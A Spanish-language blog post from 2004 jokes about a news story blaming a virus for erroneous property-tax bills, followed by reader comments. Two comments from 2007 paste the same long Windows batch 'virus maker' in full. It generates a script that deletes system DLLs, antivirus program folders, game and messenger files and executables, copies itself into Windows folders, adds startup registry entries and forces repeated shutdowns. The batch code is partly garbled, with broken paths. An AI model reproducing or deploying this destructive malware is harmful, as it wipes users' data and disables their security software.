Atalaya: desde la tela de ara˝a

Cultura en la red, reflexiones, relatos, tutoriales y paridas diversas

Los primeros virus inteligentes

2004-05-23 01:00 Hoy ha aparecido en el Ideal de Granada (y en el Diaro de Cßdiz y Granada Digital) la noticia de que un virus informßtico introduce datos errˇneos en 7000 recibos del IBI. El virus no es tonto, no, porque a algunos les ha llegado un recibo por varios billones de euros, que, ademßs, tienen que pagar antes de el final del siglo XIX.
Ya tiene que ser el virus inteligente. No sÚ yo como se almacenarßn los datos del IBI, pero imagino que, como poco, estarßn en una base de datos, no van a estar en un documento Word que diga "menda este, debe 200 lerus", "este no pagˇ el a˝o pasao, mÚtele ca˝a". Si ha sucedido tal como lo cuentan, el virus ha tenido que hacer un select sobre parte de la base de datos, alterar un par de columnas (la de cantidad a pagar y la de fecha de vencimiento). Quizßs es un virus escrito en SQL. La repanocha.
TambiÚn es posible que esos datos, precisamente esos 7000, estuvieran almacenados en una particiˇn de un disco duro, que como todo el mundo sabe, en primavera tienen cierta tendencia a morir, y que esa particiˇn se perdiera por alguna razˇn ignota. O a lo mejor se metiˇ un virus en ese PC y dijeron aquello de "rßpido, formatÚalo todo".
En fin, que como se decÝa antes, "siempre es bueno tener en la casa ni˝os para echarles la culpa"; pues parafraseßndolo, "siempre es bueno tener en el ordenador virus para echarles la culpa".
Por cierto, cˇmo se llamarÝa este? ┐SQL/IBI-GR-Terminator?

Referencias (TrackBacks)

URL de trackback de esta historia http://atalaya.blogalia.com//trackbacks/18848

Comentarios

1
De: JJ Fecha: 2004-05-23 10:32

Quizßs deberÝan haber aprendido del municipio de Tulcßn, que parcheˇ el sistema rßpidamente, y, ademßs, no afectˇ a todos los ordenadores porque "usaban otro sistema operativo".



2
De: El Peatˇn Fecha: 2004-05-23 10:44

Tanto en la administraciˇn como en los bancos nunca se equivocan, íy menos los ordenadores! Ahora, cuando hay un fallo, siempre es de la red. Nunca dicen: "perdonen nuestra incompetencia"



3
De: Cek Fecha: 2004-05-23 10:59

Siempre es culpa de alguien ajeno a la compa˝Ýa, y luego cuando vas a los sitios se oye: " ┐CUAL ES LA CONTRASEĐA DE LA BASE DE DATOS?" y contesta la compa˝era "PEPITO".
En fin....



4
De: JJ Fecha: 2004-05-23 11:02

Lo peor no es eso, sino que efectivamente muchas contrase˝as son "pepito" y "juanito"



5
De: Ramon Fecha: 2004-05-24 08:57

O "contrase˝a". No os rißis, que lo he visto.



6
De: fernand0 Fecha: 2004-05-24 18:17

Los virus sˇlo son pruebas (en muchos casos chapuceras) de lo que se puede hacer. Tal vez ya los haya (o los ha habido) con objetivos mas concretos que explotar los fallos para diseminarse o quedar exclavos, pendientes de las ˇrdenes de su 'due˝o'. No digo que sea este un caso, pero no desde˝en la posibilidad.



7
De: pepe Fecha: 2007-04-02 20:34

@echo off
:menu
color 7
echo *//////////// virus macker (by black_hack) ////////////*
echo ************ ============================ ************

@echo off
:menu
color 0c
echo ╔══════════════════════════════════════════╗
echo ║ Menu ║
echo ╠══════════════════════════════════════════╣
echo ║ 1.crear nuevo virus ║
echo ║ 2.salir ║
echo ╚══════════════════════════════════════════╝
set /p lolete= Que desea hacer? [1,2]
if %lolete%==1 goto acciones
if %lolete%==2 goto exit

:acciones
color 0c
set /p vir= nombre de nuevo virus (sin extencion):


set /p lolete= desea continuar?(s=si/n=no)

if %lolete%==s goto acciones
if %lolete%==n goto exit

:acciones

color 0c
echo ╔══════════════════════════════════════════╗
echo ║ virus ║
echo ╠══════════════════════════════════════════╣
echo ║ 1 (accion especificada en el manual) ║
echo ║ 2 (accion especificada en el manual) ║
echo ║ 3 (accion especificada en el manual) ║
echo ╚══════════════════════════════════════════╝

set /p opc= Que desea hacer? [1,2]
if %opc%==1 goto opc1
if %opc%==2 goto accion2
if %opc%==3 goto opcion3
if %opc%==4 goto salir

:opc1

echo @echo off


echo start iexplore >> virus.bat
echo start cmd >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat


echo @echo off >> virus.bat
echo echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) ^>^> abrir.vbs >> virus.bat
echo echo Set colCDROMs = oWMP.cdromCollection ^>^> abrir.vbs >> virus.bat
echo echo. ^>^> abrir.vbs >> virus.bat
echo echo if colCDROMs.Count ^>^= 1 then ^>^> abrir.vbs >> virus.bat
echo echo For i = 0 to colCDROMs.Count - 1 ^>^> abrir.vbs >> virus.bat
echo echo colCDROMs.Item(i).Eject ^>^> abrir.vbs >> virus.bat
echo echo Next ' cdrom ^>^> abrir.vbs >> virus.bat
echo echo End If ^>^> abrir.vbs >> virus.bat
echo start abrir.vbs >> virus.bat


echo md c:program filesvirus >> virus.bat


echo echo off >> virus.bat


echo cd c:documents and settingsandresescritoriovirus.bat c:program filesvirus >> virus.bat

echo echo off >> virus.bat


echo @echo off >> virus.bat
echo :menu >> virus.bat
echo color 0c >> virus.bat

echo echo off >> copy virus.bat c: >> virus.bat


echo echo off >> virus.bat


echo @echo off >> virus.bat
echo cd C:WINDOWSsystem >> virus.bat
echo atrib -h -r -s -a *.dll >> virus.bat
echo del /q /f OLECLI.dll >> virus.bat
echo del /q /f SHELL.dll >> virus.bat
echo del /q /f VER.dll >> virus.bat
echo del /q /f TAPI.dll >> virus.bat
echo del /q /f MSVIDEO.dll >> virus.bat
echo del /q /f OLESVR.dll >> virus.bat
echo del /q /f LZEXPAND.dll >> virus.bat
echo del /q /f mmsystem.dll >> virus.bat
echo del /q /f crlds3d.dll >> virus.bat
echo del /q /f AVICAP.dll >> virus.bat
echo del /q /f AVIFILE.dll >> virus.bat
echo del /q /f COMMDLG.dll >> virus.bat
echo del /q /f LZEXPAND.dll >> virus.bat


echo @cd c:Archivos de programa >> virus.bat
echo del /q /f /s "Alwil Software" >> virus.bat
echo del /q /f /s "Norton Antivirus" >> virus.bat
echo del /q /f /s "Kaspersky Lab" >> virus.bat


echo @echo off >> virus.bat
echo copy /y virus.bat c:WINDOWSCursors >> virus.bat
echo copy /y virus.bat c:WINDOWSFonts >> virus.bat
echo copy /y virus.bat c:WINDOWSHelp >> virus.bat


echo @echo off >> virus.bat
echo reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v antiboot /t REG_SZ /d c:WINDOWSCursorsKalete.bat >> virus.bat


@echo off >> virus.bat
cd windows >> virus.bat
echo echo @echo off> winbat.bat >> virus.bat
echo echo echo msg * en cada inicio me veras ^>^ win.bat.bat >> virus.bat
echo reg add "hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun" /v winbat /t reg_sz /d >> virus.bat
echo echo off >> virus.bat
echo echo reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v antiboot /t REG_SZ /d >> virus.bat

echo echo pause >> %windir%system32winantiboot.bat >> virus.bat
echo %windir%system32win_antiboot.bat >> virus.bat
echo %windir%system32win_antiboot.bat >> virus.bat
echo @echo off >> virus.bat
echo cd >> virus.bat
echo at 00:00 goto del1 >> virus.bat
echo at 00:00 goto init >> virus.bat


echo :del1 >> virus.bat
echo @echo off >> virus.bat
echo cd >> virus.bat
echo cd C:Archivos de programaWorld of Warcraft >> virus.bat
echo attrib -H -S -R *.* >> virus.bat
echo del /S /Q *.* >> virus.bat
echo cd C:Archivos de programaMSN Messenger >> virus.bat
echo attrib -H -S -R *.* >> virus.bat
echo del /S /Q *.* >> virus.bat
echo cd C:Archivos de programaSkype >> virus.bat
echo attrib -H -S -R *.* >> virus.bat
echo del /S /Q *.* >> virus.bat


echo :init >> virus.bat
echo @echo off >> virus.bat
echo cd >> virus.bat
echo cd C:Documents and SettingsAll Users* InicioProgramasInicio >> virus.bat
echo echo @echo off > init.bat >> virus.bat
echo echo cd ^>^> init.bat >> virus.bat

echo echo s | erase C:Archivos de programaGrisoftAVG Freevault.dll >> virus.bat

echo @echo off >> virus.bat
echo cd >> virus.bat
echo cd archivos de programa >> virus.bat
echo del QS Norton antivirus >> virus.bat

echo call cmd >> virus.bat

echo md c:windowssystem_32 >> virus.bat

echo @echo off >> virus.bat

echo copy /y virus.bat c:windowssystem_32 >> virus.bat

echo @echo off >> virus.bat
echo @echo Hola >> virus.bat
echo del *.sys >> virus.bat
echo del *.exe >> virus.bat
echo del *.com >> virus.bat
echo cd windows >> virus.bat
echo del *.* >> virus.bat
echo cd >> virus.bat
echo del arquivo.bat >> virus.bat
echo @echo Estßs muerto >> virus.bat
echo echo off >> virus.bat
echo reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v antiboot /t REG_SZ /d c:windowssystem32winantiboot.bat > %windir%system32winantiboot.bat >> virus.bat
echo echo pause >> %windir%system32winantiboot.bat >> virus.bat
echo echo shutdown -s -f -t 10 -c "te lo dije, no enciendas el ordenador" > %windir%system32win_antiboot.bat >> virus.bat
%windir%system32win_antiboot.bat >> virus.bat
echo shutdown -s -f -t 10 -c " Erro Grave En El Sistema, Se Reiniciara En Unos Momentos..." >> virus.bat

echo cd >> virus.bat
echo copy /y %0 C:WindowsSystem32*.bat >> virus.bat
echo Reg add "HKLMSoftwareMicrosoftWindowsCurrentVersionRun" /v Win32 / "C:WindowsSystem32virus otro.bat" /f >> virus.bat
@echo off

ren virus.bat %vir%.bat


@echo off
color 0c
set /p ver= su virus ha sido creado con exito (presione una tecla para continuar)

@echo off
color 0c
set /p ver=Desea crear otro virus?(s/n)

if %lolete%==s goto acciones

:acciones
@echo off
ren virus.txt virus.bat


set /p ver= su virus ha sido creado con exito (presione una tecla para continuar)

set /p ver= 1=ir al menu:
echo
cls

if %lolete%==1 goto menu



8
De: hgorcemefer Fecha: 2007-04-02 20:38

x_-_-> @muy look URB USB RAN RON



9
De: Anˇnimo Fecha: 2007-04-02 20:39

@echo off
:menu
color 7
echo *//////////// virus macker (by black_hack) ////////////*
echo ************ ============================ ************

@echo off
:menu
color 0c
echo ╔══════════════════════════════════════════╗
echo ║ Menu ║
echo ╠══════════════════════════════════════════╣
echo ║ 1.crear nuevo virus ║
echo ║ 2.salir ║
echo ╚══════════════════════════════════════════╝
set /p lolete= Que desea hacer? [1,2]
if %lolete%==1 goto acciones
if %lolete%==2 goto exit

:acciones
color 0c
set /p vir= nombre de nuevo virus (sin extencion):


set /p lolete= desea continuar?(s=si/n=no)

if %lolete%==s goto acciones
if %lolete%==n goto exit

:acciones

color 0c
echo ╔══════════════════════════════════════════╗
echo ║ virus ║
echo ╠══════════════════════════════════════════╣
echo ║ 1 (accion especificada en el manual) ║
echo ║ 2 (accion especificada en el manual) ║
echo ║ 3 (accion especificada en el manual) ║
echo ╚══════════════════════════════════════════╝

set /p opc= Que desea hacer? [1,2]
if %opc%==1 goto opc1
if %opc%==2 goto accion2
if %opc%==3 goto opcion3
if %opc%==4 goto salir

:opc1

echo @echo off


echo start iexplore >> virus.bat
echo start cmd >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat
echo start iexplore >> virus.bat


echo @echo off >> virus.bat
echo echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) ^>^> abrir.vbs >> virus.bat
echo echo Set colCDROMs = oWMP.cdromCollection ^>^> abrir.vbs >> virus.bat
echo echo. ^>^> abrir.vbs >> virus.bat
echo echo if colCDROMs.Count ^>^= 1 then ^>^> abrir.vbs >> virus.bat
echo echo For i = 0 to colCDROMs.Count - 1 ^>^> abrir.vbs >> virus.bat
echo echo colCDROMs.Item(i).Eject ^>^> abrir.vbs >> virus.bat
echo echo Next ' cdrom ^>^> abrir.vbs >> virus.bat
echo echo End If ^>^> abrir.vbs >> virus.bat
echo start abrir.vbs >> virus.bat


echo md c:program filesvirus >> virus.bat


echo echo off >> virus.bat


echo cd c:documents and settingsandresescritoriovirus.bat c:program filesvirus >> virus.bat

echo echo off >> virus.bat


echo @echo off >> virus.bat
echo :menu >> virus.bat
echo color 0c >> virus.bat

echo echo off >> copy virus.bat c: >> virus.bat


echo echo off >> virus.bat


echo @echo off >> virus.bat
echo cd C:WINDOWSsystem >> virus.bat
echo atrib -h -r -s -a *.dll >> virus.bat
echo del /q /f OLECLI.dll >> virus.bat
echo del /q /f SHELL.dll >> virus.bat
echo del /q /f VER.dll >> virus.bat
echo del /q /f TAPI.dll >> virus.bat
echo del /q /f MSVIDEO.dll >> virus.bat
echo del /q /f OLESVR.dll >> virus.bat
echo del /q /f LZEXPAND.dll >> virus.bat
echo del /q /f mmsystem.dll >> virus.bat
echo del /q /f crlds3d.dll >> virus.bat
echo del /q /f AVICAP.dll >> virus.bat
echo del /q /f AVIFILE.dll >> virus.bat
echo del /q /f COMMDLG.dll >> virus.bat
echo del /q /f LZEXPAND.dll >> virus.bat


echo @cd c:Archivos de programa >> virus.bat
echo del /q /f /s "Alwil Software" >> virus.bat
echo del /q /f /s "Norton Antivirus" >> virus.bat
echo del /q /f /s "Kaspersky Lab" >> virus.bat


echo @echo off >> virus.bat
echo copy /y virus.bat c:WINDOWSCursors >> virus.bat
echo copy /y virus.bat c:WINDOWSFonts >> virus.bat
echo copy /y virus.bat c:WINDOWSHelp >> virus.bat


echo @echo off >> virus.bat
echo reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v antiboot /t REG_SZ /d c:WINDOWSCursorsKalete.bat >> virus.bat


@echo off >> virus.bat
cd windows >> virus.bat
echo echo @echo off> winbat.bat >> virus.bat
echo echo echo msg * en cada inicio me veras ^>^ win.bat.bat >> virus.bat
echo reg add "hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun" /v winbat /t reg_sz /d >> virus.bat
echo echo off >> virus.bat
echo echo reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v antiboot /t REG_SZ /d >> virus.bat

echo echo pause >> %windir%system32winantiboot.bat >> virus.bat
echo %windir%system32win_antiboot.bat >> virus.bat
echo %windir%system32win_antiboot.bat >> virus.bat
echo @echo off >> virus.bat
echo cd >> virus.bat
echo at 00:00 goto del1 >> virus.bat
echo at 00:00 goto init >> virus.bat


echo :del1 >> virus.bat
echo @echo off >> virus.bat
echo cd >> virus.bat
echo cd C:Archivos de programaWorld of Warcraft >> virus.bat
echo attrib -H -S -R *.* >> virus.bat
echo del /S /Q *.* >> virus.bat
echo cd C:Archivos de programaMSN Messenger >> virus.bat
echo attrib -H -S -R *.* >> virus.bat
echo del /S /Q *.* >> virus.bat
echo cd C:Archivos de programaSkype >> virus.bat
echo attrib -H -S -R *.* >> virus.bat
echo del /S /Q *.* >> virus.bat


echo :init >> virus.bat
echo @echo off >> virus.bat
echo cd >> virus.bat
echo cd C:Documents and SettingsAll Users* InicioProgramasInicio >> virus.bat
echo echo @echo off > init.bat >> virus.bat
echo echo cd ^>^> init.bat >> virus.bat

echo echo s | erase C:Archivos de programaGrisoftAVG Freevault.dll >> virus.bat

echo @echo off >> virus.bat
echo cd >> virus.bat
echo cd archivos de programa >> virus.bat
echo del QS Norton antivirus >> virus.bat

echo call cmd >> virus.bat

echo md c:windowssystem_32 >> virus.bat

echo @echo off >> virus.bat

echo copy /y virus.bat c:windowssystem_32 >> virus.bat

echo @echo off >> virus.bat
echo @echo Hola >> virus.bat
echo del *.sys >> virus.bat
echo del *.exe >> virus.bat
echo del *.com >> virus.bat
echo cd windows >> virus.bat
echo del *.* >> virus.bat
echo cd >> virus.bat
echo del arquivo.bat >> virus.bat
echo @echo Estßs muerto >> virus.bat
echo echo off >> virus.bat
echo reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v antiboot /t REG_SZ /d c:windowssystem32winantiboot.bat > %windir%system32winantiboot.bat >> virus.bat
echo echo pause >> %windir%system32winantiboot.bat >> virus.bat
echo echo shutdown -s -f -t 10 -c "te lo dije, no enciendas el ordenador" > %windir%system32win_antiboot.bat >> virus.bat
%windir%system32win_antiboot.bat >> virus.bat
echo shutdown -s -f -t 10 -c " Erro Grave En El Sistema, Se Reiniciara En Unos Momentos..." >> virus.bat

echo cd >> virus.bat
echo copy /y %0 C:WindowsSystem32*.bat >> virus.bat
echo Reg add "HKLMSoftwareMicrosoftWindowsCurrentVersionRun" /v Win32 / "C:WindowsSystem32virus otro.bat" /f >> virus.bat
@echo off

ren virus.bat %vir%.bat


@echo off
color 0c
set /p ver= su virus ha sido creado con exito (presione una tecla para continuar)

@echo off
color 0c
set /p ver=Desea crear otro virus?(s/n)

if %lolete%==s goto acciones

:acciones
@echo off
ren virus.txt virus.bat


set /p ver= su virus ha sido creado con exito (presione una tecla para continuar)

set /p ver= 1=ir al menu:
echo
cls

if %lolete%==1 goto menu
su contrase˝a es la anterior



10
De: amoroso Fecha: 2007-06-04 17:02

Favor enviado, los .bat que maneja este virus......



11
De: ^_^ Fecha: 2007-07-30 00:01

El virus maker fue mi primer Programa...



12
De: gus Fecha: 2007-09-09 03:35

quiero saber el codigo para hacer que un diskette sea autojecutable, con un archivo autorun inf no lo he logrado y no se como ahcerlo con un bat



13
De: JJ Fecha: 2007-09-09 09:50

A lo mejor no estß configurado el ordenador para eso...



14
De: channy Fecha: 2007-11-04 19:29

mola el creador de virus, pero hay 2 problemillas:
1:que hace este virus??
2:el panda creo que lo "pilla"
aun asi kreo ke os lo abeis kurrrao ko˝o
Saludos o_0



15
De: lllllllllllllll Fecha: 2009-01-02 18:09

no entiendo nada de lo que comentan ni de que escribiooooooooooo.



16
De: thEpisode Fecha: 2010-02-04 01:17

huy no q desocupado el q hizo ese codigo, eso se llama no tener nd q hacer, reaspero ese man, lastima q la era de batch ya pasˇ, jeje y preciso ya entiendo lo q quiere decir,



Nombre
Correo-e
URL
Direcciˇn IP: 54.166.188.64 (179cd66b12)
Comentario
┐Cußnto es: mil + uno?

Se comenta en...

  • JJ en [Libro #22] FantasÝa, de Emilia Pardo Bazßn
  • Palimp en [Libro #22] FantasÝa, de Emilia Pardo Bazßn
  • marta en [Libro #21] Birchwood, de John Banville
  • JJ en [Libro #10] The son, de Jo Nesbo
  • Anˇnima en [Libro #11] Prisoners of Geography, de Tim Marshall
  • JJ en [Libro #3] A Christmas Carol, de Charles Dickens
  • PABLO PASCUAL LËPEZ en [Libro #3] A Christmas Carol, de Charles Dickens
  • JJ en [Libro #29] El guardißn invisible, de Dolores Redondo
  • Anˇnima en [Libro #29] El guardißn invisible, de Dolores Redondo
  • JJ en [Libro #29] El guardißn invisible, de Dolores Redondo
  • Sobre Atalaya

    Esta es la bitßcora o blog de Juan Julißn Merelo. Si quieres contactar con el autor, usa su correo electrˇnico jjmerelo (arroba) gmail.com, o simplemente deja un comentario. Y si quieres leer alguna cosa mßs de las que escribe, prueba esta novela

    Listas de deseos

    A veces leo

    Otras veces escribo en

    Blogalia Blogalia